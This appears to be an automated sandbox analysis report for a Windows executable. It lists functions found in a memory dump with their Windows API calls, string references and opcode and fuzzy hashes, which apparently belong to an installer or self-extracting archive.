IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF22A

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
String ID:
API String ID: 4119318379-0
Opcode ID: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
Instruction ID: ef4879ac40f2dd94f54389030b6aaa5e255230cd27a9553b558526a8320cd49c
Opcode Fuzzy Hash: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
Instruction Fuzzy Hash: 7841C232B1468286F7009F61E815BAA2370EB86BDAF440139DF8A87F95CE3DD4458794

Function 00007FF6CCC8EF10 Relevance: 11.0, APIs: 7, Instructions: 453COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8F542
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8F548
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8F554
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8F55A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8F560
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8F56C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8F572

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 62b60af2f7a88576df12e3db194ad19acd1e3759869934ce613b8f4ca490e85a
Instruction ID: 7b59af8be06b1b135780f22d64ccec3869a469bc1a8cee83fa39655c5303f514
Opcode Fuzzy Hash: 62b60af2f7a88576df12e3db194ad19acd1e3759869934ce613b8f4ca490e85a
Instruction Fuzzy Hash: 6012A162F08B8285EB10DFA5D4546AE2371EB857A9F400236DF9C97AD9DF3CE586C340

Function 00007FF6CCC924C0 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FF6CCC9259B
GetLastError.KERNEL32 ref: 00007FF6CCC925AE
CreateFileW.KERNEL32 ref: 00007FF6CCC9260E
GetLastError.KERNEL32 ref: 00007FF6CCC92617
SetFileTime.KERNEL32 ref: 00007FF6CCC926C9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC92736

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3536497005-0
Opcode ID: dc46ff84bd0c57c9ac2b9914d0228e8f14f7433d989622a2074281460ea8d587
Instruction ID: f1d34d31e203303fc9c5904f9cf6f9b6264ebf88006b5688697cd7e2624a577b
Opcode Fuzzy Hash: dc46ff84bd0c57c9ac2b9914d0228e8f14f7433d989622a2074281460ea8d587
Instruction Fuzzy Hash: DF61CF66A1868186E7208F29E44436E67B1BB847BDF101334DFEE43AE9DF3DD0998744

Function 00007FF6CCCAB014 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32 ref: 00007FF6CCCAB02A
GetObjectW.GDI32 ref: 00007FF6CCCAB05B
DeleteObject.GDI32 ref: 00007FF6CCCAB095
DeleteObject.GDI32 ref: 00007FF6CCCAB0C5

Part of subcall function 00007FF6CCCA8624: FindResourceW.KERNEL32 ref: 00007FF6CCCA863D
Part of subcall function 00007FF6CCCA8624: SizeofResource.KERNEL32 ref: 00007FF6CCCA8659
Part of subcall function 00007FF6CCCA8624: LoadResource.KERNEL32 ref: 00007FF6CCCA8673
Part of subcall function 00007FF6CCCA8624: LockResource.KERNEL32 ref: 00007FF6CCCA8685
Part of subcall function 00007FF6CCCA8624: GlobalAlloc.KERNEL32 ref: 00007FF6CCCA86A6
Part of subcall function 00007FF6CCCA8624: GlobalLock.KERNEL32 ref: 00007FF6CCCA86BB
Part of subcall function 00007FF6CCCA8624: GdipAlloc.GDIPLUS ref: 00007FF6CCCA86FE
Part of subcall function 00007FF6CCCA8624: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF6CCCA8769
Part of subcall function 00007FF6CCCA8624: GlobalUnlock.KERNEL32 ref: 00007FF6CCCA878C
Part of subcall function 00007FF6CCCA8624: GlobalFree.KERNEL32 ref: 00007FF6CCCA8795

Strings

], xrefs: 00007FF6CCCAB063

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
String ID: ]
API String ID: 2347093688-3352871620
Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
Instruction ID: cab4c746f3b7bd051f47f7045f61a6c68e62d3f6c05e125acc6cb882806cca71
Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
Instruction Fuzzy Hash: 01119671F0D6C247FA249F12965927953B1AFC9BC2F080038DB9D87B99DE2CE8068740

Function 00007FF6CCCAAE1C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 00007FF6CCCAAE32
GetMessageW.USER32 ref: 00007FF6CCCAAE49
IsDialogMessageW.USER32 ref: 00007FF6CCCAAE60
TranslateMessage.USER32 ref: 00007FF6CCCAAE6F
DispatchMessageW.USER32 ref: 00007FF6CCCAAE7A

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
Instruction ID: 0d0fc7cec20886bd28686efd60e99eaa3948be30a336f148a293bd043f72bddb
Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
Instruction Fuzzy Hash: 03F0EC25A3858283FB549F20E89AA762371BFD5746F805439E78EC1864DF2CD558CB40

Function 00007FF6CCCA91E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 00007FF6CCCA9211
SHAutoComplete.SHLWAPI ref: 00007FF6CCCA9255

Part of subcall function 00007FF6CCCA13C4: CompareStringW.KERNEL32 ref: 00007FF6CCCA13E3

FindWindowExW.USER32 ref: 00007FF6CCCA923F

Strings

EDIT, xrefs: 00007FF6CCCA921B, 00007FF6CCCA9233

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
Instruction ID: f2ee4375bf21dff11d6b235a605b6af095ac530593760539a1bd4987bb850d56
Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
Instruction Fuzzy Hash: E0011261B18AC381FB209F21E8167F563B4BF99796F441135CB8EC6655DE2CD189C640

Function 00007FF6CCC92CE0 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(00007FF6CCC98C9A), ref: 00007FF6CCC92D22
WriteFile.KERNEL32 ref: 00007FF6CCC92D6C
WriteFile.KERNELBASE ref: 00007FF6CCC92D9A

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 759593f06e971a5af3dff942057e3884964648b854c35b3f90eb8150d1d2c130
Instruction ID: cc992bb33cbdde6570c23441ca87b587a578acbfd6072a9f21b9d85e792d4350
Opcode Fuzzy Hash: 759593f06e971a5af3dff942057e3884964648b854c35b3f90eb8150d1d2c130
Instruction Fuzzy Hash: DC51D322A19AC292FB509F25D85477A6370FF45BAAF441132EBCD86AA4DF7CE485C300

Function 00007FF6CCCB03E0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32 ref: 00007FF6CCCB0556
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCB05C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCB05C7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCB05CD

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ItemText
String ID:
API String ID: 3750147219-0
Opcode ID: 6c4656332c9140f1047d0f4986e8674c7ab5c6f5b771fee762bbe589533beb78
Instruction ID: d3b778fc765957e405cd757796eb4d687a386463a2f63b770b2893b44e26bd2b
Opcode Fuzzy Hash: 6c4656332c9140f1047d0f4986e8674c7ab5c6f5b771fee762bbe589533beb78
Instruction Fuzzy Hash: E651C3A2F14A9284FB009FA4D8552AD2372BF45BA6F400236DF9D97BE5DF6CD045C308

Function 00007FF6CCCB2D6C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF6CCCB2D7B

Part of subcall function 00007FF6CCCB27FC: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6CCCB281E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6CCCB2D90
__scrt_release_startup_lock.LIBCMT ref: 00007FF6CCCB2DFE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6CCCB2E51

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
Instruction ID: 1d30e700ef54068783470da9f202005c89ec1d59561c595ad1c042e3eb69afc4
Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
Instruction Fuzzy Hash: 10310A21E082D342FA54AFE5D4753BA22B1AF41386F440434EBDECB6D3DE6CA8458251

Function 00007FF6CCC93684 Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,00000000,?,00007FF6CCC9309D), ref: 00007FF6CCC936CE
CreateDirectoryW.KERNEL32 ref: 00007FF6CCC93733
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FF6CCC9309D), ref: 00007FF6CCC93791
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC937CE

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2359106489-0
Opcode ID: 5cda4ea00785afd89f4b2a0283e369f756aeb3863be6a65230e4b36aaec5c4cf
Instruction ID: f9e12d8b55b20b262d601ede90a9993b3c29a8b525cfdb0871f177f202cf0524
Opcode Fuzzy Hash: 5cda4ea00785afd89f4b2a0283e369f756aeb3863be6a65230e4b36aaec5c4cf
Instruction Fuzzy Hash: 2031B366A0C6C281EB609F25A59427A6371FF897AAF5C0231EFEDC36D5DF3CD4458600

Function 00007FF6CCC92320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,00000000,00007FF6CCC92927,?,00100000,?,00000001,00000000,00000000,?,00007FF6CCC914C1), ref: 00007FF6CCC92348
ReadFile.KERNELBASE ref: 00007FF6CCC92367
GetLastError.KERNEL32 ref: 00007FF6CCC9239B
GetLastError.KERNEL32 ref: 00007FF6CCC923BA

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
Instruction ID: ff0701e79f670a889c9e5df28cb0b3b1cb19f8033175855bab96b1b31e1227ba
Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
Instruction Fuzzy Hash: EB218121E1C6D2C1EB649F21A44023E63B8FB45BAEF144531DBDDCA688CF7CE8858751

Function 00007FF6CCC9E948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCC9ECD8: ResetEvent.KERNEL32 ref: 00007FF6CCC9ECF1
Part of subcall function 00007FF6CCC9ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF6CCC9ED07

ReleaseSemaphore.KERNEL32 ref: 00007FF6CCC9E974
FindCloseChangeNotification.KERNELBASE ref: 00007FF6CCC9E993
DeleteCriticalSection.KERNEL32 ref: 00007FF6CCC9E9AA
CloseHandle.KERNEL32 ref: 00007FF6CCC9E9B7

Part of subcall function 00007FF6CCC9EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6CCC9E95F,?,?,?,00007FF6CCC9463A,?,?,?), ref: 00007FF6CCC9EA63
Part of subcall function 00007FF6CCC9EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6CCC9E95F,?,?,?,00007FF6CCC9463A,?,?,?), ref: 00007FF6CCC9EA6E

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
String ID:
API String ID: 2143293610-0
Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
Instruction ID: 7adf6d8166e2b64d1cc9d0577e425a1ccc81a013a2558bc7fd131248e1037744
Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
Instruction Fuzzy Hash: 7901ED32A14A91A2E648AF21E5842ADA371FB84B91F004035DB9D93665CF39E4B5C740

Function 00007FF6CCC9EAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF6CCC9EAE0
SetThreadPriority.KERNEL32 ref: 00007FF6CCC9EB36

Strings

CreateThread failed, xrefs: 00007FF6CCC9EAEE

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Thread$CreatePriority
String ID: CreateThread failed
API String ID: 2610526550-3849766595
Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
Instruction ID: 4c237b32d6ca6cfce6a81ac46f27a1dd2aa8b81ee021efac65b01c43d93b533a
Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
Instruction Fuzzy Hash: BC115131A08AC2C1E714EF10E8811BA7370FB9579AF54413ADBCD82669EF3CE596C744

Function 00007FF6CCCA946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCC9DFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF6CCC9DDDF

OleInitialize.OLE32 ref: 00007FF6CCCA9486
SHGetMalloc.SHELL32 ref: 00007FF6CCCA94D4

Strings

riched20.dll, xrefs: 00007FF6CCCA9475

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: DirectoryInitializeMallocSystem
String ID: riched20.dll
API String ID: 174490985-3360196438
Opcode ID: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
Instruction ID: 56e55ef4946c9d3f018b228eb283489e79af1b231d65376addc0a59244aec32b
Opcode Fuzzy Hash: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
Instruction Fuzzy Hash: E1F04F71A18AC182EB009F60F41516AB3B0FB89795F400139EACE82B54DF7CD199CB00

Function 00007FF6CCCA095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCCA853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF6CCCA856C

Part of subcall function 00007FF6CCC9AAE0: LoadStringW.USER32 ref: 00007FF6CCC9AB67
Part of subcall function 00007FF6CCC9AAE0: LoadStringW.USER32 ref: 00007FF6CCC9AB80

Part of subcall function 00007FF6CCC81FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC81FFB

Part of subcall function 00007FF6CCC8129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CCC81396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCB01BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCB01C1
SendDlgItemMessageW.USER32 ref: 00007FF6CCCB01F2

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
String ID:
API String ID: 3106221260-0
Opcode ID: f7793a058a2a9ae74a8b13b48e826019ebcce49a9c5359d39c692031bfe510b0
Instruction ID: f6df57a58c290d6beeeca67022a484efe46b983cddc95f94f175db3b75c227bc
Opcode Fuzzy Hash: f7793a058a2a9ae74a8b13b48e826019ebcce49a9c5359d39c692031bfe510b0
Instruction Fuzzy Hash: 49519D62F0568286FB10AFA5D4552FD2372AB89B99F400236DF8ED77DADE2CE5418340

Function 00007FF6CCCA9F4C Relevance: 4.6, APIs: 3, Instructions: 146COMMON

Download Yara Rule

APIs

SHFileOperationW.SHELL32 ref: 00007FF6CCCAA118
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAA184
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAA18A

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
